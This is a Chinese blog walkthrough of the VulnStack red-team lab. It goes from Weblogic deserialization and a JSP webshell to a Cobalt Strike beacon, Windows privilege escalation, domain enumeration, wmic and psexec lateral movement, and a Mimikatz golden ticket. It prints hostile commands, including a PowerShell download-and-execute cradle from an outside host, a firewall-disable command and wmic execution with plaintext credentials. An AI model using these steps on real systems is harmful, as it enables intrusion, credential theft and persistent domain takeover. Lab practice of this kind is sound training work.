红日安全内网渗透笔记

靶场下载地址:漏洞详情

环境配置参考:【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园

红日安全内网渗透笔记_第1张图片

此实战仅有3台机器 DMZ区的WEB机 、核心区的AD机、办公区的PC

第一步:信息收集(模拟黑盒测试)

已知WEB机的IP地址,用syn包进行扫描。

nmap -sS -v 192.168.111.80

获得开放端口

WEB服务器:
Nmap scan report for 192.168.111.80
PORT      STATE SERVICE
80/tcp    open  http       
135/tcp   open  msrpc
139/tcp   open  netbios-ssn    Samba服务  存在爆破/未授权访问/远程命令执行漏洞
445/tcp   open  microsoft-ds   smb服务  ms17-010/端口溢出漏洞
1433/tcp  open  ms-sql-s  存在mssql服务  存在爆破/注入/SA弱口令
3389/tcp  open  ms-wbt-server  存在远程桌面
7001/tcp  open  afs3-callback    weblogic漏洞
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49156/tcp open  unknown
MAC Address: 00:0C:29:68:D3:5F (VMware)

 whatWEB扫描

whatweb http://192.168.111.80:7001

得到信息:

http://192.168.111.80:7001 [404 Not Found]
 Country[RESERVED][ZZ], IP[192.168.111.80],
 Java[2.1][Servlet/2.5],
 Title[Error 404--Not Found], 
X-Powered-By[Servlet/2.5 JSP/2.1]

观察知道这是一个java开发的WEB,那就扫扫看有没有java类的漏洞 

工具地址:GitHub - rabbitmask/WeblogicScan: Weblogic一键漏洞检测工具,V1.5,更新时间:20200730

利用到WeblogicScan来扫描 

python3 WeblogicScan.py -u 192.168.111.80 -p 7001

得到漏洞信息:

 [192.168.111.80:7001] Weblogic Version Is 10.3.6.0
[+] [192.168.111.80:7001] Weblogic console address is exposed! The path is: http://192.168.111.80:7001/console/login/LoginForm.jsp
[+] [192.168.111.80:7001] Weblogic UDDI module is exposed! The path is: http://192.168.111.80:7001/uddiexplorer/
[-] [192.168.111.80:7001] weblogic not detected CVE-2016-0638
[-] [192.168.111.80:7001] weblogic not detected CVE-2016-3510
[-] [192.168.111.80:7001] weblogic not detected CVE-2017-10271
[-] [192.168.111.80:7001] weblogic not detected CVE-2017-3248
[-] [192.168.111.80:7001] weblogic not detected CVE-2017-3506
[-] [192.168.111.80:7001] weblogic not detected CVE-2018-2628
[-] [192.168.111.80:7001] weblogic not detected CVE-2018-2893
[-] [192.168.111.80:7001] weblogic not detected CVE-2018-2894
[+] [192.168.111.80:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2725
[+] [192.168.111.80:7001] weblogic has a JAVA deserialization vulnerability:CVE-2019-2729
[-] [192.168.111.80:7001] weblogic not detected CVE-2019-2890

发现两个java序列化漏洞

扫描WEB目录:

dirb http://192.168.111.80:7001

获得信息

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Apr 10 02:14:41 2022
URL_BASE: http://192.168.111.80:7001/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------


        
---- Scanning URL: http://192.168.111.80:7001/ ----
+ http://192.168.111.80:7001/console (CODE:200|SIZE:416)                             
==> DIRECTORY: http://192.168.111.80:7001/uddi/        
DIRECTORY: http://192.168.111.80:7001/uddiexplorer/                               
                                                                                     
---- Entering directory: http://192.168.111.80:7001/uddi/ ----
==> DIRECTORY: http://192.168.111.80:7001/uddi/images/                               
                                                                                     
---- Entering directory: http://192.168.111.80:7001/uddi/images/ ----
                                                                                     
-----------------
END_TIME: Sun Apr 10 02:15:21 2022
DOWNLOADED: 13836 - FOUND: 1

都去访问一下就知道,uddi目录是没有权限进入的,但是uddiexplorer可以进入,这里将成为我们大马的安家之地。

第二步  漏洞利用:

使用java 反序列化终极测试工具测试漏洞

红日安全内网渗透笔记_第2张图片

Java反序列化终极检测工具_Jboss & Weblogic & Websphere.zip - 开发实例、源码下载 - 好例子网

执行命令权限administrator,webshell上传一个jsp大马,利用文件管理寻找前面分析的uddiexplorer这个目录。

上传shell

红日安全内网渗透笔记_第3张图片

 上传的冰蝎我没成功,无法连接,但是我上传其他的大马。

红日安全内网渗透笔记_第4张图片

 github有很多,搜索关键词shell就可以找到!

可能是版本问题,java,或者命令行转义问题等。。。

powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://172.16.250.3:8022/a') 

这条命令的CS利用,我并没有成功。但是我发现file upload是可以用的,于是我决定用beacon.exe来获取shell,上线CS

第三步  上线CS:

CS制作小马

红日安全内网渗透笔记_第5张图片

 红日安全内网渗透笔记_第6张图片

 获得一个beacon.exe

红日安全内网渗透笔记_第7张图片

 利用浏览器的大马上传这个beancon.exe 到 windows/temp/

红日安全内网渗透笔记_第8张图片

 然后进入cmd执行里执行这句话:

红日安全内网渗透笔记_第9张图片

 

 .... 发现CS就上线了

红日安全内网渗透笔记_第10张图片

提权:

利用漏洞提权:

jsp大马中
----------------
先输入这条代码:

systeminfo>C:\Windows\Temp\a.txt&(for %i in (
KB3124280 KB3143141 KB3134228 KB3079904 KB3077657 KB3124280 KB3045171 KB2829361 KB3000061 KB3000061 KB2850851 KB2707511 KB970483 KB2124261 KB2271195 KB2503665 KB3031432) do @type C:\Windows\Temp\a.txt|@find /I "%i"|| @echo %i Not Installed!)&del /f /q /a C:\Windows\Temp\a.txt

 红日安全内网渗透笔记_第11张图片

下面是漏洞对照表:

----------------------------------------
CVE-2017-0213  [Windows COM Elevation of Privilege Vulnerability]  (windows 10/8.1/7/2016/2010/2008)
MS17-010  [KB4013389]  [Windows Kernel Mode Drivers]  (windows 7/2008/2003/XP)
MS16-135  [KB3199135]  [Windows Kernel Mode Drivers]  (2016)
MS16-098  [KB3178466]  [Kernel Driver]  (Win 8.1)
MS16-075  [KB3164038]  [Hot Potato]  (2003/2008/7/8/2012)
MS16-032  [KB3143141]  [Secondary Logon Handle]  (2008/7/8/10/2012)
MS16-016  [KB3136041]  [WebDAV]  (2008/Vista/7)
MS15-097  [KB3089656]  [remote code execution]  (win8.1/2012)
MS15-076  [KB3067505]  [RPC]  (2003/2008/7/8/2012)
MS15-077  [KB3077657]  [ATM]  (XP/Vista/Win7/Win8/2000/2003/2008/2012)
MS15-061  [KB3057839]  [Kernel Driver]  (2003/2008/7/8/2012)
MS15-051  [KB3057191]  [Windows Kernel Mode Drivers]  (2003/2008/7/8/2012)
MS15-010  [KB3036220]  [Kernel Driver]  (2003/2008/7/8)
MS15-015  [KB3031432]  [Kernel Driver]  (Win7/8/8.1/2012/RT/2012 R2/2008 R2)
MS15-001  [KB3023266]  [Kernel Driver]  (2008/2012/7/8)
MS14-070  [KB2989935]  [Kernel Driver]  (2003)
MS14-068  [KB3011780]  [Domain Privilege Escalation]  (2003/2008/2012/7/8)
MS14-058  [KB3000061]  [Win32k.sys]  (2003/2008/2012/7/8)
MS14-040  [KB2975684]  [AFD Driver]  (2003/2008/2012/7/8)
MS14-002  [KB2914368]  [NDProxy]  (2003/XP)
MS13-053  [KB2850851]  [win32k.sys]  (XP/Vista/2003/2008/win 7)
MS13-046  [KB2840221]  [dxgkrnl.sys]  (Vista/2003/2008/2012/7)
MS13-005  [KB2778930]  [Kernel Mode Driver]  (2003/2008/2012/win7/8)
MS12-042  [KB2972621]  [Service Bus]  (2008/2012/win7)
MS12-020  [KB2671387]  [RDP]  (2003/2008/7/XP)
MS11-080  [KB2592799]  [AFD.sys]  (2003/XP)
MS11-062  [KB2566454]  [NDISTAPI]  (2003/XP)
MS11-046  [KB2503665]  [AFD.sys]  (2003/2008/7/XP)
MS11-011  [KB2393802]  [kernel Driver]  (2003/2008/7/XP/Vista)
MS10-092  [KB2305420]  [Task Scheduler]  (2008/7)
MS10-065  [KB2267960]  [FastCGI]  (IIS 5.1, 6.0, 7.0, and 7.5)
MS10-059  [KB982799]   [ACL-Churraskito]  (2008/7/Vista)
MS10-048  [KB2160329]  [win32k.sys]  (XP SP2 & SP3/2003 SP2/Vista SP1 & SP2/2008 Gold & SP2 & R2/Win7)
MS10-015  [KB977165]   [KiTrap0D]  (2003/2008/7/XP)
MS09-050  [KB975517]   [Remote Code Execution]  (2008/Vista)
MS09-020  [KB970483]   [IIS 6.0]  (IIS 5.1 and 6.0)
MS09-012  [KB959454]   [Chimichurri]  (Vista/win7/2008/Vista)
MS08-068  [KB957097]   [Remote Code Execution]  (2000/XP)
MS08-067  [KB958644]   [Remote Code Execution]  (Windows 2000/XP/Server 2003/Vista/Server 2008)
MS08-025  [KB941693]   [Win32.sys]  (XP/2003/2008/Vista)
MS06-040  [KB921883]   [Remote Code Execution]  (2003/xp/2000)
MS05-039  [KB899588]   [PnP Service]  (Win 9X/ME/NT/2000/XP/2003)
MS03-026  [KB823980]   [Buffer Overrun In RPC Interface]  (/NT/2000/XP/2003)

随便找个漏洞的exp来提权,我这里就跳过上传步骤了,直接到CS上线

Win64.exe是exp

红日安全内网渗透笔记_第12张图片

CS下执行找个:

shell C:\Windows\Temp\Win64.exe "C:\Windows\Temp\beacon5.exe"

执行后CS上线

红日安全内网渗透笔记_第13张图片

 域信息收集

ipconfig /all
查看域名 net config workstation
关闭防火墙  netsh advfirewall set allprofiles state off
查看有几个域  net view /domain
查看域内主机   nei view
查询域内用户   net user /domain #该命令在本环境中需要在system权限下执行
查看域管理员   net group "domain admins" /domain  
查看域控    net group "domain controllers" /domain

Portscan

红日安全内网渗透笔记_第14张图片

 

红日安全内网渗透笔记_第15张图片

 然后在tagert里面psexec上线DC的CS

红日安全内网渗透笔记_第16张图片

 

接下来,讲讲如何利用CS做socks4a 来获取AD机器Cs上线

红日安全内网渗透笔记_第17张图片

 红日安全内网渗透笔记_第18张图片

 

红日安全内网渗透笔记_第19张图片

 红日安全内网渗透笔记_第20张图片

 

红日安全内网渗透笔记_第21张图片

 红日安全内网渗透笔记_第22张图片

 

一样的,上传这个beacon.exe  到AD机上,WEB机上用IPC来vmic命令远程执行

命令如下

 shell wmic /node:10.10.10.10 /user:administrator /password:1qaz@WSX process call create "C:\Windows\Temp\payload.exe"

user可以改成de1ay,改谁就获得谁CS上线的权限

4.2黄金票据利用

黄金票据是伪造票据授予票据(TGT),也被称为认证票据。TGT仅用于向域控制器上的密钥分配中心(KDC)证明用户已被其他域控制器认证。

黄金票据的条件要求:

1.域名称

2.域的SID值

3.域的KRBTGT账户NTLM密码哈希

4.伪造用户名

cs的DUmp hashs  和 Run Mimikatz 获得KRBTGT的hash值和域的SID

红日安全内网渗透笔记_第23张图片

 

Golden Ticket 就是黄金票据。

制作完成后,在tagert上线时候

红日安全内网渗透笔记_第24张图片

即使AD机改了管理员密码,你依然可以利用这个票据来获得管理员权限上线AD机

参考:

【红日安全-VulnStack】ATT&CK实战系列——红队实战(二) - yokan - 博客园

你可能感兴趣的:(渗透测试,CS,域环境,网络安全)